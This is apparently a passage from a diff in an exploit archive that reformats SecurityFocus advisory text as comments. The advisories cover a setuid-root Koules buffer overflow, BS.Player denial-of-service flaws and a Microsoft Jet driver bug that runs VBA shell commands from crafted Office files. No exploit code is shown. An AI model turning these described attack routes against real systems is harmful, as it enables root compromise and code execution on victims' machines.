source: http://www.securityfocus.com/bid/1967/info
Koules is an original, arcade-style game authored by Jan Hubicka. The version using svgalib is usually installed setuid root so that it may access video hardware when being run at the console by regular users. This version contains a buffer overflow vulnerability that may allow a user to gain higher priviledges. The vulnerability exists in handling of user-supplied commandline arguments.
Successful exploitation of this vulnerability leads to root compromise. Debian has announced they are not vulnerable to this problem.
*/
/*

15
platforms/windows/dos/34767.py
View file

@ -1,10 +1,11 @@
source: http://www.securityfocus.com/bid/43502/info
BS.Player is prone to multiple remote denial-of-service vulnerabilities.
An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.
BS.Player 2.56 is vulnerable; other versions may also be affected.
# source: http://www.securityfocus.com/bid/43502/info
#
# BS.Player is prone to multiple remote denial-of-service vulnerabilities.
#
# An attacker can exploit these issues to cause an affected application to crash, denying service to legitimate users.
#
# BS.Player 2.56 is vulnerable; other versions may also be affected.
#
#!/usr/bin/python
#

15
platforms/windows/remote/19435.html
View file

@ -1,10 +1,11 @@
source:http://www.securityfocus.com/bid/548/info
A vulnerability affects Microsoft's Jet 3.51 and 4.0 driver (MSJET35.DLL and MSJET40.DLL).
This vulnerability could allow an attacker to create malicious '.xls' or '.doc' files incorporating VBA shell commands. When the file is opened, the shell commands contained in the file will execute on the target system. Command execution will occur in the context of the user that is opening the file.
The file could be distributed via email, the web (including in hidden frames), or any number of methods.
# source: http://www.securityfocus.com/bid/548/info
#
# A vulnerability affects Microsoft's Jet 3.51 and 4.0 driver (MSJET35.DLL and MSJET40.DLL).
#
# This vulnerability could allow an attacker to create malicious '.xls' or '.doc' files incorporating VBA shell commands. When the file is opened, the shell commands contained in the file will execute on the target system. Command execution will occur in the context of the user that is opening the file.
#
# The file could be distributed via email, the web (including in hidden frames), or any number of methods.
#
<HTML>
<HEAD>